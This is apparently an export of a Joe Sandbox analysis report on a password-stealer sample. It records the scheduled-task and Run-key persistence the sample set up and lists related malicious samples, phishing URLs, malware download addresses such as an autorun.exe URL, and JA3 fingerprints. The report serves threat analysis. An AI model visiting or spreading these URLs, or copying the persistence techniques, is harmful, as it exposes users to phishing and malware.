Excluded IPs from analysis (whitelisted): 23.55.235.251, 192.229.211.108, 142.251.32.99, 34.104.35.123, 13.107.42.16, 13.107.21.239, 204.79.197.239, 13.107.6.158, 13.107.21.200, 204.79.197.200, 23.40.179.55, 23.40.179.37, 142.251.32.106, 142.251.35.163, 23.49.251.134, 23.49.251.151, 23.40.179.38, 23.40.179.47, 142.251.40.227, 142.250.80.67, 35.81.110.220, 34.210.248.216, 52.13.68.45, 20.189.173.21, 142.250.72.106, 142.251.40.138, 142.250.176.202, 142.251.40.170, 142.251.40.106, 142.250.80.42, 142.251.35.170, 142.251.40.234, 142.250.64.106, 142.251.41.10, 142.250.80.74, 172.217.165.138, 142.250.80.106, 142.251.40.202, 142.250.81.234, 142.250.80.99, 142.250.65.202, 142.250.80.10, 142.250.65.170, 142.250.65.234, 142.250.81.227, 142.251.40.163, 204.79.197.203, 20.94.151.93, 23.200.3.30, 23.200.3.20, 23.43.85.31, 23.43.85.9, 23.43.85.42, 23.43.85.39, 23.43.85.27, 23.43.85.29, 23.43.85.21, 23.43.85.18, 23.43.85.43, 104.77.150.186, 104.77.150.169, 104.77.150.139, 104.77.150.148, 20.110.205.119, 52.159.100.48, 13.69.
Excluded domains from analysis (whitelisted): nav-edge.smartscreen.microsoft.com, slscr.update.microsoft.com, a416.dscd.akamai.net, img-s-msn-com.akamaized.net, data-edge.smartscreen.microsoft.com, clientservices.googleapis.com, edgeassetservice.afd.azureedge.net, aus5.mozilla.org, a19.dscg10.akamai.net, tm-prod-wd-csp-edge.trafficmanager.net, e86303.dscx.akamaiedge.net, ocsp.digicert.com, locprod2-elb-us-west-2.prod.mozaws.net, login.live.com, config-edge-skype.l-0007.l-msedge.net, www-bing-com.dual-a-0001.a-msedge.net, update.googleapis.com, www.gstatic.com, l-0007.l-msedge.net, e28578.d.akamaiedge.net, www.bing.com, assets.msn.com.edgekey.net, fonts.googleapis.com, fs.microsoft.com, shavar.prod.mozaws.net, content-autofill.googleapis.com, bingadsedgeextension-prod.trafficmanager.net, dual-a-0001.a-msedge.net, cdp-tlu-ssl-shim.trafficmanager.net, www-www.bing.com.trafficmanager.net, ocsp.pki.goog, business-bing-com.b-0005.b-msedge.net, wildcardtlu-ssl.azureedge.net, a1834.dscg2.akamai.net, edgedl.me.gvt1.co
Execution Graph export aborted for target MPGPH131.exe, PID 1464 because it is empty
Execution Graph export aborted for target MPGPH131.exe, PID 6272 because it is empty
Execution Graph export aborted for target RageMP131.exe, PID 2792 because it is empty
HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size exceeded maximum capacity and may have missing network information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtQueryVolumeInformationFile calls found.
Report size getting too big, too many NtReadFile calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Report size getting too big, too many NtWriteFile calls found.
Report size getting too big, too many NtWriteVirtualMemory calls found.
VT rate limit hit for: SecuriteInfo.com.Win32.PWSX-gen.24221.17365.exe

Simulations

Behavior and APIs

Time	Type	Description
00:34:12	Task Scheduler	Run new task: MPGPH131 HR path: C:\ProgramData\MPGPH131\MPGPH131.exe
00:34:12	Task Scheduler	Run new task: MPGPH131 LG path: C:\ProgramData\MPGPH131\MPGPH131.exe
00:34:14	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run RageMP131 C:\Users\user\AppData\Local\RageMP131\RageMP131.exe
00:34:23	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run RageMP131 C:\Users\user\AppData\Local\RageMP131\RageMP131.exe
00:34:51	API Interceptor	527231x Sleep call for process: explorhe.exe modified
00:34:52	Task Scheduler	Run new task: explorhe.exe path: C:\Users\user\AppData\Local\Temp\d887ceb89d\explorhe.exe
00:34:54	API Interceptor	1x Sleep call for process: WerFault.exe modified
00:35:36	API Interceptor	1x Sleep call for process: firefox.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
13.107.246.40	Invoice#RV0937.svg	Get hash	malicious	Unknown	Browse
	https://p20.zdusercontent.com/attachment/24126/bO28w8fzEUGkxCMWlMOEpz2Vb?token=**********	Get hash	malicious	HTMLPhisher	Browse
	OTJ Outstanding Statement.xlsx	Get hash	malicious	HTMLPhisher	Browse
	http://livespoints.com/sso.dsv.com	Get hash	malicious	Unknown	Browse
	1-17-24.msg	Get hash	malicious	HTMLPhisher	Browse
	https://h1xhw4w4rh.adosierthy.tech/?email=a3JhbW9zQG5jY29tbXVuaXR5Y29sbGVnZXMuZWR1	Get hash	malicious	HTMLPhisher	Browse
	https://r20.rs6.net/tn.jsp?f=001TaX7jDxmCi2eZvptKt6YZHHfPD5XaY0RqPVKqIWmnudYsT5_GxLrJsqkSliyFqrDLohXKnzLakgaQgR7dA3QOOHnXrLC-WAUxMpXRV4XVhciGwRUSLv7VtjLWKRLO6sHsRDVlTT73fU=&c=gjXYX_Eg_XXCMTg1AHu6JU9s7WKKMqZUv7bdaN7V_BCfqTnxbB0kXw==&c=&ch==&__=/mfytgutmd65fr/Y25Abm92b3p5bWVzLmNvbQ==	Get hash	malicious	HTMLPhisher	Browse
	https://r20.rs6.net/tn.jsp?f=001SumwzTzStnmZ0BnWzHmm-i9hKkLve-J1sfNEdtbKGwGu10ghi6zsuaesr94HgFUKyGSeSzR9RuxQUvPsCk5X5DxLNOKwgAZVnfeLSfAcTWxU3ebtP3M3slqpuR9Y7y5QPlGc1uBIt1xM3w9YRZ2sbJrh-Pt14L3_Hrsz_FHjKVs=&c=&ch===&__=/?test@microsoft.com	Get hash	malicious	Fake Captcha, HTMLPhisher	Browse
	SecuriteInfo.com.Trojan.Siggen23.22903.15219.31710.exe	Get hash	malicious	Amadey, RisePro Stealer	Browse
	InvoiceJ9AR10_PDF.svg	Get hash	malicious	Unknown	Browse
	https://1drv.ms/b/s!Au_iWJNj9ucega8VdNm54Y_182oELA	Get hash	malicious	Unknown	Browse
	https://na4.docusign.net/Signing/EmailStart.aspx?a=11a8ea43-f4a1-4673-9748-a405652ae492&acct=6c24687d-2e8f-4891-ae9a-0598273c3835&er=f3d8a336-fdac-4a63-abb1-6df677145058	Get hash	malicious	HTMLPhisher	Browse
	https://1m6mqba64sdu-1323816442.cos.na-toronto.myqcloud.com/1m6mqba64sdu.html	Get hash	malicious	HTMLPhisher	Browse
	https://r20.rs6.net/tn.jsp?f=001Qj__emGD9Bdq3jIbmTGzXeZtKP-gL9EOTVwYA5oIhXAYUkGQwue91c0c-myzSYqSUJ90bB2Bol9LvoeGqzl-IuKGsPYzAOr7jbNB4RN_SfyeVzt9IHZ0QAKTbFZEd7cKkaeQu5DtNiF6YcQwmKGWXWZIY1504l9T&c=&ch==&__=/DOMC/YWJyYXZvQGV2ZXJzaGVkcy1zdXRoZXJsYW5kLmVz	Get hash	malicious	HTMLPhisher	Browse
	https://tap-rt-prod1-t.campaign.adobe.com/r/?id=h9ecb88b,c1e96b3,69fe0fb&p1=teensgrieve.org/.asirodj/?q=aWJkZ0Bub3ZvenltZXMuY29t	Get hash	malicious	HTMLPhisher	Browse
	http://lndustrialwerksaustralia-docsiuhfeioh.nimbusweb.me/share/10105497/2qxe489s74rsqmtgo0xe	Get hash	malicious	HTMLPhisher	Browse
	https://mfaauthexx.grksteels.com/frank.user@fbi.gov	Get hash	malicious	HTMLPhisher	Browse
	https://fanlink.to/tYDV	Get hash	malicious	Unknown	Browse
	WEXTRACT.exe	Get hash	malicious	Unknown	Browse
	Actioned_EFTREMITTANCE00087.html	Get hash	malicious	HTMLPhisher	Browse
194.33.191.102	71H7GzO624.exe	Get hash	malicious	Petite Virus, RedLine, RisePro Stealer, Socks5Systemz, Stealc, Tofsee, Vidar	Browse	194.33.191.102/autorun.exe
194.33.191.102	LU7TWS3uAl.exe	Get hash	malicious	Petite Virus, PrivateLoader, RedLine, RisePro Stealer, Socks5Systemz, Stealc	Browse	194.33.191.102/autorun.exe
34.117.237.239	SecuriteInfo.com.Trojan.Siggen23.22903.15219.31710.exe	Get hash	malicious	Amadey, RisePro Stealer	Browse
	WEXTRACT.exe	Get hash	malicious	Unknown	Browse
	cdwx.exe	Get hash	malicious	Unknown	Browse
	tWfizSwnIO.exe	Get hash	malicious	Unknown	Browse
	IgnR9tbNCb.exe	Get hash	malicious	RisePro Stealer	Browse
	wx3.exe	Get hash	malicious	Unknown	Browse
	ISO Certificate_pdf.html	Get hash	malicious	Unknown	Browse
	a.out.exe	Get hash	malicious	Unknown	Browse
	Arglesmorgay.exe	Get hash	malicious	Unknown	Browse
	lpk.dll	Get hash	malicious	Unknown	Browse
	MDE_File_Sample_87ad0936c403d0ddfbceff0fa4e6c681c37cf072.zip	Get hash	malicious	Unknown	Browse
	KFP.311.152.2023.pdf.lnk	Get hash	malicious	Unknown	Browse
	ALL-20230526.xlsx	Get hash	malicious	Unknown	Browse
	https://1drv.ms/b/s!Aj_dAsJOtS3GeKVcEaa61wq6boU?e=TSuYkW	Get hash	malicious	Unknown	Browse
	idman642build2.exe	Get hash	malicious	Unknown	Browse
	FACFFEA545BA2D1D9E9AB4ED74.dll	Get hash	malicious	Unknown	Browse
	https://drive.google.com/uc?export=download&id=1KgHo8oMsciWr0SHmcJ8Af0eMTe3KBKoC	Get hash	malicious	Unknown	Browse
	Ftaskmrg.exe	Get hash	malicious	Unknown	Browse
	maidservant.dll	Get hash	malicious	PikaBot	Browse
	b.dll	Get hash	malicious	Unknown	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
example.org	WEXTRACT.exe	Get hash	malicious	Unknown	Browse	93.184.216.34
	cdwx.exe	Get hash	malicious	Unknown	Browse	93.184.216.34
	boinkwx.exe	Get hash	malicious	Unknown	Browse	93.184.216.34
	tWfizSwnIO.exe	Get hash	malicious	Unknown	Browse	93.184.216.34
	IgnR9tbNCb.exe	Get hash	malicious	RisePro Stealer	Browse	93.184.216.34
	file.exe	Get hash	malicious	RisePro Stealer	Browse	93.184.216.34
	file.exe	Get hash	malicious	RisePro Stealer	Browse	93.184.216.34
	wx3.exe	Get hash	malicious	Unknown	Browse	93.184.216.34
	WEXTRACT.EXE.exe	Get hash	malicious	Unknown	Browse	93.184.216.34
	WEXTRACT2.EXE.exe	Get hash	malicious	Unknown	Browse	93.184.216.34
	ISO Certificate_pdf.html	Get hash	malicious	Unknown	Browse	93.184.216.34
	a.out.exe	Get hash	malicious	Unknown	Browse	93.184.216.34
	Arglesmorgay.exe	Get hash	malicious	Unknown	Browse	93.184.216.34
	lpk.dll	Get hash	malicious	Unknown	Browse	93.184.216.34
	MDE_File_Sample_87ad0936c403d0ddfbceff0fa4e6c681c37cf072.zip	Get hash	malicious	Unknown	Browse	93.184.216.34
	KFP.311.152.2023.pdf.lnk	Get hash	malicious	Unknown	Browse	93.184.216.34
	ALL-20230526.xlsx	Get hash	malicious	Unknown	Browse	93.184.216.34
	https://1drv.ms/b/s!Aj_dAsJOtS3GeKVcEaa61wq6boU?e=TSuYkW	Get hash	malicious	Unknown	Browse	93.184.216.34
	idman642build2.exe	Get hash	malicious	Unknown	Browse	93.184.216.34
	FACFFEA545BA2D1D9E9AB4ED74.dll	Get hash	malicious	Unknown	Browse	93.184.216.34
chrome.cloudflare-dns.com	EpsilonSpaceWorld.exe	Get hash	malicious	Unknown	Browse	104.18.23.202
	Invoice#RV0937.svg	Get hash	malicious	Unknown	Browse	162.159.61.3
	https://transfer.e-fax.org/file_download/4002344058/citibank_statement_dec_2023.pdf	Get hash	malicious	Unknown	Browse	172.64.41.3
	http://livespoints.com/sso.dsv.com	Get hash	malicious	Unknown	Browse	162.159.61.3
	https://trk.klclick3.com/ls/click?upn=60zrMRL8humPvMqOvvRGEuEJJsMVI-2BknHKCVUZkMvstETNbQbXMPWBJfSvVXZnmtsEYAJ4DibuQh0787jUaY8HgL-2FZxXyYdwTGrzdhNF2Y-2FhJEocYELFODqNqyRZfJvvdD7Z57dp-2B-2FxjX-2FFjvbNwAIt3tCbctb80cokyl4EidX5GdWxEzq7NxAONk-2BPwpGU9dnYA7rJ-2F4-2BrL1VbeV0JxJCV2ErlrLhB1qSePk5CFgiPGQWyt8-2FHJ-2BDNIWsKZmsUxde9ZOSNRE7Q5zdAlRv873Yk0cI9XsomcbYag3Wzlk0CuX22XYdDHRTpwPYcccje3xl0K_SwQzVbHIfFE9uWxeRIZUf7sxBlUMVV5-2BDExu8iBnKFTH6HQpYy7M65-2B4MHCQXlgAO-2BztY8UDe8f3HgJqiLMLbMOS-2FfUY0chtqi04f-2FuhXQfcmhi6-2BAj7QtD02dM9GXIWrZRlTb5T0dVUpP5OA80v-2FTY33Szujc8rh3501bGxqyx4rX2ZtQXmx-2Bv7RSPMeTEQRYITB1r5f9JFgJr70MTTa6gT-2FJTfggzljpxYKjIUGDr4iPqOdkRN1fnPzPFmtFErNTfrBiidHv6DuUQHF0ldldXxCUtbTjjwoG4z6VaNZAJuS1vjQXcFE5BxdLru8qVX	Get hash	malicious	Unknown	Browse	172.64.41.3
	https://livespoints.com/sso.dsv.com	Get hash	malicious	Unknown	Browse	172.64.41.3
	InvoiceJ9AR10_PDF.svg	Get hash	malicious	Unknown	Browse	162.159.61.3
	EpsilonSpaceWorld.exe	Get hash	malicious	Unknown	Browse	172.64.41.3
	WEXTRACT.exe	Get hash	malicious	Unknown	Browse	172.64.41.3
	https://padlet.com/dave386/bsg-logistics-5p791yve09sn7wu4	Get hash	malicious	Unknown	Browse	162.159.61.3
	nso7806.exe	Get hash	malicious	Unknown	Browse	162.159.61.3
	https://laser-gravur.cc/uploads/go.php?0g6dc	Get hash	malicious	Unknown	Browse	172.64.41.3
	cdwx.exe	Get hash	malicious	Unknown	Browse	162.159.61.3
	boinkwx.exe	Get hash	malicious	Unknown	Browse	172.64.41.3
	tWfizSwnIO.exe	Get hash	malicious	Unknown	Browse	172.64.41.3
	IgnR9tbNCb.exe	Get hash	malicious	RisePro Stealer	Browse	172.64.41.3
	file.exe	Get hash	malicious	RisePro Stealer	Browse	172.64.41.3
	file.exe	Get hash	malicious	RisePro Stealer	Browse	162.159.61.3
	SecuriteInfo.com.FileRepMalware.22461.28845.exe	Get hash	malicious	Unknown	Browse	172.64.41.3
	$R2PE83Y.exe	Get hash	malicious	Unknown	Browse	162.159.61.3

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AQUA-ASRO	SecuriteInfo.com.Trojan.Siggen23.22903.15219.31710.exe	Get hash	malicious	Amadey, RisePro Stealer	Browse	194.33.191.102
	file.exe	Get hash	malicious	RedLine	Browse	194.33.191.102
	Attach.html	Get hash	malicious	HTMLPhisher	Browse	194.33.191.140
	SecuriteInfo.com.Win32.PWSX-gen.30340.23979.exe	Get hash	malicious	RedLine	Browse	194.33.191.102
	SecuriteInfo.com.Win32.PWSX-gen.23210.9609.exe	Get hash	malicious	RedLine	Browse	194.33.191.102
	file.exe	Get hash	malicious	RedLine	Browse	194.33.191.102
	1QvXZzi81p.exe	Get hash	malicious	RedLine	Browse	194.33.191.102
	docx1.hta	Get hash	malicious	AsyncRAT, DcRat, VenomRAT	Browse	194.33.191.248
	ppt1.hta	Get hash	malicious	AsyncRAT, DcRat, VenomRAT	Browse	194.33.191.248
	blues.exe	Get hash	malicious	AsyncRAT, VenomRAT	Browse	194.33.191.248
	sys.ps1	Get hash	malicious	AsyncRAT, VenomRAT	Browse	194.33.191.248
	file.exe	Get hash	malicious	RedLine, zgRAT	Browse	194.33.191.60
	file.exe	Get hash	malicious	RedLine, zgRAT	Browse	194.33.191.60
	file.exe	Get hash	malicious	RedLine	Browse	194.33.191.102
	file.exe	Get hash	malicious	RedLine	Browse	194.33.191.102
	file.exe	Get hash	malicious	RedLine	Browse	194.33.191.102
	DPDsvcx.exe	Get hash	malicious	RedLine	Browse	194.33.191.102
	AUEmRB9z3Z.exe	Get hash	malicious	RedLine	Browse	194.33.191.102
	file.exe	Get hash	malicious	RedLine	Browse	194.33.191.102
	file.exe	Get hash	malicious	RedLine	Browse	194.33.191.60
GOOGLE-AS-APGoogleAsiaPacificPteLtdSG	EpsilonSpaceWorld.exe	Get hash	malicious	Unknown	Browse	34.117.118.44
	SecuriteInfo.com.Trojan.Siggen23.22903.15219.31710.exe	Get hash	malicious	Amadey, RisePro Stealer	Browse	34.117.186.192
	EpsilonSpaceWorld.exe	Get hash	malicious	Unknown	Browse	34.117.118.44
	file.exe	Get hash	malicious	PrivateLoader	Browse	34.117.186.192
	file.exe	Get hash	malicious	RisePro Stealer	Browse	34.117.186.192
	http://dbree.org	Get hash	malicious	Unknown	Browse	34.66.73.214
	doc2009988876370093845_1601202400.exe	Get hash	malicious	FormBook, GuLoader, Remcos	Browse	34.117.103.128
	WEXTRACT.exe	Get hash	malicious	Unknown	Browse	34.117.237.239
	citacionpoderjudicl.msi	Get hash	malicious	Unknown	Browse	34.117.186.192
	https://v.reachum.com/newershowroom/89b73f96-63f4-46b3-90ae-0ec5950d068c/f512b58b-feb0-4f6e-b90e-a6619f102dda	Get hash	malicious	HTMLPhisher	Browse	34.117.218.181
	SecuriteInfo.com.Trojan.Siggen23.22903.24587.4515.exe	Get hash	malicious	RisePro Stealer	Browse	34.117.186.192
	file.exe	Get hash	malicious	RisePro Stealer	Browse	34.117.186.192
	cdwx.exe	Get hash	malicious	Unknown	Browse	34.117.237.239
	tWfizSwnIO.exe	Get hash	malicious	Unknown	Browse	34.117.237.239
	IgnR9tbNCb.exe	Get hash	malicious	RisePro Stealer	Browse	34.117.237.239
	http://89.190.156.10/w.sh	Get hash	malicious	Unknown	Browse	34.117.121.53
	http://mylovelybluesky.com	Get hash	malicious	Unknown	Browse	34.117.228.201
	file.exe	Get hash	malicious	RisePro Stealer	Browse	34.117.186.192
	SecuriteInfo.com.FileRepMalware.22461.28845.exe	Get hash	malicious	Unknown	Browse	34.117.186.192
	https://bio.to/case792	Get hash	malicious	Unknown	Browse	34.117.186.192
MICROSOFT-CORP-MSN-AS-BLOCKUS	https://use2.pages.dev/	Get hash	malicious	HTMLPhisher	Browse	40.76.134.238
	#U26a0#Ufe0fBiolegend_ CALLER DETAILS AVAILABLE _ REF # 36413641 On 17 January 2024.eml	Get hash	malicious	Phisher	Browse	52.111.229.6
	URFYXBtR.eml	Get hash	malicious	HTMLPhisher	Browse	104.47.75.220
	Clearworld Limited Contract document 2024.xls.zip	Get hash	malicious	HTMLPhisher	Browse	52.109.8.89
	https://e.trustifi.com/#/fff0f6/3b034b/69910d/e33bb8/5b1e44/18c765/f8909e/c6e541/e8666a/ef542d/85972d/627493/9a11d6/1f4096/1d247f/d0da29/cd3585/80cff1/eaf704/2641c2/c084ad/a14c04/f60812/3adbe9/f7d041/4f8d78/37d9a3/9eb5fb/91479e/892753/8c1f30/9d693b/2a0446/af6550/622c1f/3d0978/653c19/fb8256/d5bbe8/06f3b2/6622ca/c0715b/b1dc4b/bfdbe8/3c0bc4/95282d/c75070/272cc6/51465b/ff0cfe/917e7a/e6c86e/3e41c5/d01483/42abaa/b780c1/5155d4/53aa72/8ba008/97686f/fe7049/0a2973/f9c803/028068/1f0747/07cdde/d7bf27/7d56b6/b2eaef/78f21e/1ad764/f7db46/7673e0/8a089e/da9d2f/0c1756/a2f541/15ea30/fbbbf1/e79d48/8a22a2/2a0aa1/bd49dd/89ef9f/4b76d8/0ee4f1/28a13f/a1cdc0/1b7141/1a335d/5f4b89	Get hash	malicious	HTMLPhisher	Browse	20.190.152.22
	http://kugs.vipku.org/4EameH2979CPbk273kjuzxrriqa14014SCJHJGOXVHMJBHR889062RABJ9063b12	Get hash	malicious	Phisher	Browse	20.50.64.3
	https://t.ly/lHk2Z	Get hash	malicious	HTMLPhisher	Browse	13.107.213.40
	Invoice#RV0937.svg	Get hash	malicious	Unknown	Browse	13.89.179.8
	https://p20.zdusercontent.com/attachment/24126/bO28w8fzEUGkxCMWlMOEpz2Vb?token=**********	Get hash	malicious	HTMLPhisher	Browse	13.107.213.36
	MT103_0216009430_-_Anun#U021b_de_transfer_efectuat.pdf.xla.xlsx	Get hash	malicious	Unknown	Browse	13.107.219.40
	OTJ Outstanding Statement.xlsx	Get hash	malicious	HTMLPhisher	Browse	52.109.8.89
	http://livespoints.com/sso.dsv.com	Get hash	malicious	Unknown	Browse	52.159.100.48
	vRecording__57secs__AUD-olgoonik_VM#33033303.htm	Get hash	malicious	HTMLPhisher	Browse	13.107.213.40
	1-17-24.msg	Get hash	malicious	HTMLPhisher	Browse	104.47.56.156
	https://h1xhw4w4rh.adosierthy.tech/?email=a3JhbW9zQG5jY29tbXVuaXR5Y29sbGVnZXMuZWR1	Get hash	malicious	HTMLPhisher	Browse	13.107.246.40
	https://r20.rs6.net/tn.jsp?f=001TaX7jDxmCi2eZvptKt6YZHHfPD5XaY0RqPVKqIWmnudYsT5_GxLrJsqkSliyFqrDLohXKnzLakgaQgR7dA3QOOHnXrLC-WAUxMpXRV4XVhciGwRUSLv7VtjLWKRLO6sHsRDVlTT73fU=&c=gjXYX_Eg_XXCMTg1AHu6JU9s7WKKMqZUv7bdaN7V_BCfqTnxbB0kXw==&c=&ch==&__=/mfytgutmd65fr/Y25Abm92b3p5bWVzLmNvbQ==	Get hash	malicious	HTMLPhisher	Browse	13.107.213.40
	Possible SpamPourriel PossibleRE Gift from Canadian Tire.zip	Get hash	malicious	Phisher	Browse	52.109.8.89
	https://bmwag-rt-prod2-t.campaign.adobe.com/r/?id=h2ccc12b,8d23fb3,492093b&p1=//r20.rs6.net/tn.jsp?f=001TaX7jDxmCi2eZvptKt6YZHHfPD5XaY0RqPVKqIWmnudYsT5_GxLrJsqkSliyFqrDLohXKnzLakgaQgR7dA3QOOHnXrLC-WAUxMpXRV4XVhciGwRUSLv7VtjLWKRLO6sHsRDVlTT73fU=&c=gjXYX_Eg_XXCMTg1AHu6JU9s7WKKMqZUv7bdaN7V_BCfqTnxbB0kXw==&c=&ch==&__=/mfytgutmd65fr/Y2Z1bmtAemlwcG8uY29t	Get hash	malicious	HTMLPhisher	Browse	13.107.213.40
	https://r20.rs6.net/tn.jsp?f=001SumwzTzStnmZ0BnWzHmm-i9hKkLve-J1sfNEdtbKGwGu10ghi6zsuaesr94HgFUKyGSeSzR9RuxQUvPsCk5X5DxLNOKwgAZVnfeLSfAcTWxU3ebtP3M3slqpuR9Y7y5QPlGc1uBIt1xM3w9YRZ2sbJrh-Pt14L3_Hrsz_FHjKVs=&c=&ch===&__=/?test@microsoft.com	Get hash	malicious	Fake Captcha, HTMLPhisher	Browse	13.107.246.40
	SecuriteInfo.com.Trojan.Siggen23.22903.15219.31710.exe	Get hash	malicious	Amadey, RisePro Stealer	Browse	13.107.21.200

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
28a2c9bd18a11de089ef85a160da29e4	https://lacahardraditer.tk/_/bWNNgqr9/GAGSxc/?	Get hash	malicious	TechSupportScam	Browse	40.126.24.84 40.127.169.103 23.196.61.234
	https://lilatodero.tk/_/alkrYTBo/Eiqe3z/?	Get hash	malicious	TechSupportScam	Browse	40.126.24.84 40.127.169.103 23.196.61.234
	https://vserpetsaecribear.cf/_/V0oDpBbA/BKp346/?	Get hash	malicious	TechSupportScam	Browse	40.126.24.84 40.127.169.103 23.196.61.234
	https://petcyafecune.tk/_/pFRwS1q4/Kwhn6q/?	Get hash	malicious	TechSupportScam	Browse	40.126.24.84 40.127.169.103 23.196.61.234
	https://cl3.tranx1.pics/wQA2xPs6v80SrXGZmftdHbOLy/?	Get hash	malicious	TechSupportScam	Browse	40.126.24.84 40.127.169.103 23.196.61.234
	https://cl9.tranx1.pics/wQA2xPs6v80SrXGZmftdHbOLy/?	Get hash	malicious	TechSupportScam	Browse	40.126.24.84 40.127.169.103 23.196.61.234
	https://bulkasubtomocar.cf/_/mcuWrU7z/BWDM5Y/?	Get hash	malicious	TechSupportScam	Browse	40.126.24.84 40.127.169.103 23.196.61.234
	https://askjang.top	Get hash	malicious	Unknown	Browse	40.126.24.84 40.127.169.103 23.196.61.234
	https://app.typeset.com/play/R89PL	Get hash	malicious	Unknown	Browse	40.126.24.84 40.127.169.103 23.196.61.234
	https://giant-brace-675.notion.site/SHAH-SMITH-ASSOCIATES-IN-a0b279071b9745139df817671a031b09	Get hash	malicious	HTMLPhisher	Browse	40.126.24.84 40.127.169.103 23.196.61.234
	URFYXBtR.eml	Get hash	malicious	HTMLPhisher	Browse	40.126.24.84 40.127.169.103 23.196.61.234
	https://thims1.in/Message%20Centre/mc.php	Get hash	malicious	Unknown	Browse	40.126.24.84 40.127.169.103 23.196.61.234
	http://drinkbodyarmor.bradytolbertstudios.com/ZHRpdHVzQGRyaW5rYm9keWFybW9yLmNvbQ==	Get hash	malicious	Unknown	Browse	40.126.24.84 40.127.169.103 23.196.61.234
	https://gsdgroup.ca/fr/content/40-vms	Get hash	malicious	Unknown	Browse	40.126.24.84 40.127.169.103 23.196.61.234
	http://fdxx.julianateb.info/?3eg99m2	Get hash	malicious	Phisher	Browse	40.126.24.84 40.127.169.103 23.196.61.234
	https://googleweblight.com/i?u=https://pub-d96d4614f29b4f898c90ea395a2ce77f.r2.dev/Cga7su0.html#phillip.perkins@alliancebanktexas.com	Get hash	malicious	HTMLPhisher	Browse	40.126.24.84 40.127.169.103 23.196.61.234
	https://choosetotruck.com/cdn-vs/cache.php	Get hash	malicious	Unknown	Browse	40.126.24.84 40.127.169.103 23.196.61.234
	https://e.trustifi.com/#/fff0f6/3b034b/69910d/e33bb8/5b1e44/18c765/f8909e/c6e541/e8666a/ef542d/85972d/627493/9a11d6/1f4096/1d247f/d0da29/cd3585/80cff1/eaf704/2641c2/c084ad/a14c04/f60812/3adbe9/f7d041/4f8d78/37d9a3/9eb5fb/91479e/892753/8c1f30/9d693b/2a0446/af6550/622c1f/3d0978/653c19/fb8256/d5bbe8/06f3b2/6622ca/c0715b/b1dc4b/bfdbe8/3c0bc4/95282d/c75070/272cc6/51465b/ff0cfe/917e7a/e6c86e/3e41c5/d01483/42abaa/b780c1/5155d4/53aa72/8ba008/97686f/fe7049/0a2973/f9c803/028068/1f0747/07cdde/d7bf27/7d56b6/b2eaef/78f21e/1ad764/f7db46/7673e0/8a089e/da9d2f/0c1756/a2f541/15ea30/fbbbf1/e79d48/8a22a2/2a0aa1/bd49dd/89ef9f/4b76d8/0ee4f1/28a13f/a1cdc0/1b7141/1a335d/5f4b89	Get hash	malicious	HTMLPhisher	Browse	40.126.24.84 40.127.169.103 23.196.61.234
	https://hrpayroll2024.softr.app/	Get hash	malicious	Unknown	Browse	40.126.24.84 40.127.169.103 23.196.61.234
	http://uft8-login-account-sign-required.midswaycorp.com	Get hash	malicious	Unknown	Browse	40.126.24.84 40.127.169.103 23.196.61.234
a0e9f5d64349fb13191bc781f81f42e1	MT103_0216009430_-_Anun#U021b_de_transfer_efectuat.pdf.xla.xlsx	Get hash	malicious	Unknown	Browse	34.117.186.192
	file.exe	Get hash	malicious	LummaC, Glupteba, LummaC Stealer, SmokeLoader, Socks5Systemz, Stealc	Browse	34.117.186.192
	QEK1alSEcL.exe	Get hash	malicious	LummaC, Glupteba, LummaC Stealer, SmokeLoader, Stealc	Browse	34.117.186.192
	file.exe	Get hash	malicious	PrivateLoader	Browse	34.117.186.192
	file.exe	Get hash	malicious	RisePro Stealer	Browse	34.117.186.192
	file.exe	Get hash	malicious	LummaC, GCleaner, LummaC Stealer	Browse	34.117.186.192
	http://dbree.org	Get hash	malicious	Unknown	Browse	34.117.186.192
	BILLXOFXLADING.xls	Get hash	malicious	Unknown	Browse	34.117.186.192
	MDE_File_Sample_0e9d1c53bfb8f43b777a5c0e25f0a850e1a521b3.zip	Get hash	malicious	Unknown	Browse	34.117.186.192
	file.exe	Get hash	malicious	LummaC	Browse	34.117.186.192
	SecuriteInfo.com.Win64.Evo-gen.6521.26445.exe	Get hash	malicious	LummaC	Browse	34.117.186.192
	Accept Files.Docx	Get hash	malicious	Unknown	Browse	34.117.186.192
	DSV_122023624150_7018701115.js	Get hash	malicious	Unknown	Browse	34.117.186.192
	DSV_122023624150_7018701115.js	Get hash	malicious	Unknown	Browse	34.117.186.192
	nso7806.exe	Get hash	malicious	Unknown	Browse	34.117.186.192
	SecuriteInfo.com.Trojan.Siggen23.22903.24587.4515.exe	Get hash	malicious	RisePro Stealer	Browse	34.117.186.192
	file.exe	Get hash	malicious	LummaC	Browse	34.117.186.192
	file.exe	Get hash	malicious	LummaC, Glupteba, LummaC Stealer, RedLine, SmokeLoader, Stealc, Vidar	Browse	34.117.186.192
	Orden_de_compra_PO_N#U00b0_1052022_20220114..xla.xlsx	Get hash	malicious	Unknown	Browse	34.117.186.192
	SWIFT_COPY.xls	Get hash	malicious	Unknown	Browse	34.117.186.192
37f463bf4616ecd445d4a1937da06e19	SecuriteInfo.com.Trojan.DownLoader46.44011.13581.29916.exe	Get hash	malicious	Unknown	Browse	104.21.21.16
	R5504576_GG001_1054173_8065325_333090_04000_PT_PD_1.cmd	Get hash	malicious	GuLoader	Browse	104.21.21.16
